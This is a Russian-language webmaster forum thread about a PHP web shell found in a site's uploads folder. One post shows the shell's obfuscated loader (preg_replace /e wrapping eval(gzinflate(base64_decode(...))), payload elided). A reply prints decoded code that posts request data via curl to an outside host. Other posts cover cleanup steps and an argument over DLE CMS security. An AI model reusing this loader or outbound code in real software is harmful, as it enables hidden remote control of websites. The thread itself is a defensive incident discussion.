На одном из своих сайтов нарыл файл, страненький такой, вот его содержание <?PHP $auth_pass = "тут 20 цифр"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5 -тут дохуя всяких буква, точек, черточек и циферий - P8C'\x29\x29\x29\x3B",".");?> По ходу шелл я так понимаю...?
@yuris, http://www.unphp.net/decode/79b17150ff686f521344ccb4cea19830/ начало и конец похожи, может то что и у тебя...
Залили его в папку уплоадс, и файл .htaccess в этой же папке очистили и выставили права 644. Что сделал, удалил этот файл с шеллом, вернул обратно .htaccess и выставил права 444, что еще надо сделать?
в поле Original Code защифрованный код в файле. на верху - расшифрованный, но там ещё есть несколько раз base64_decode, несколько помню, чтою его раскодировать надо сделать base64_encode и тогда увидишь куда этот скрипт ломился и что он делал по курлу...
Код: <?php ?><?php $hantu = $_GET[ghost]; $id = $_GET[id]; if (substr($id, 0, 2) == "62") { $nomor2 = $id; } else if (substr($id, 0, 1) == "0") { $nomor2 = "62" . substr($id, 1); } $ch = curl_init(http://zosms.net/andy.php); curl_setopt($ch, CURLOPT_POSTFIELDS, 'to=' . $nomor2 . '&hantu=' . $hantu . '&submit=Submit'); curl_setopt($ch, CURLOPT_HEADER, false); curl_exec($ch); curl_close($ch); ?>
но у меня zosms.net даже найти не может, видимо очень старый файл у тебя этот )) или сайт вырубили пока
@byroot, ) я вообще не в зуб ногой о чем ты говоришь... я настолько далек от этого, весь писец. Объясни просто, по-человечьи.
как недавно выяснилось, что такой же шелл был недавно залит на версию 10.6, так что, дело не в версиях. Это DLE всегда был, есть и будет решетом и похуй какие версии, свободная дырка как у вокзальной шлюхи всегда найдется!
до версии 10,0 периодически вылезали патчи безопасности, после версий выше - ещё ни одной дырки не было официально, и заплатки тоже. Так же, последняя дырка - это "Потенциальная угроза в модуле Minify", а minify использовали ни одни разработчики DLE! В большинстве случаев так же шеллы заливали через шаблоны. Вы уверены что на версии 9х у вас чистый шаб? Вообще вариантов масса как залить шелл, и дырки ДЛЕ тут ни причём! Так что зря вы наговариваете на неё... Если опасаитесь - не используйте!
Просто оставлю это здесь http://zerocoolpro.biz/forum/threads/xxx-so-studentkoj-ili-kak-donesti-do-polzovatelej-foruma.4212/
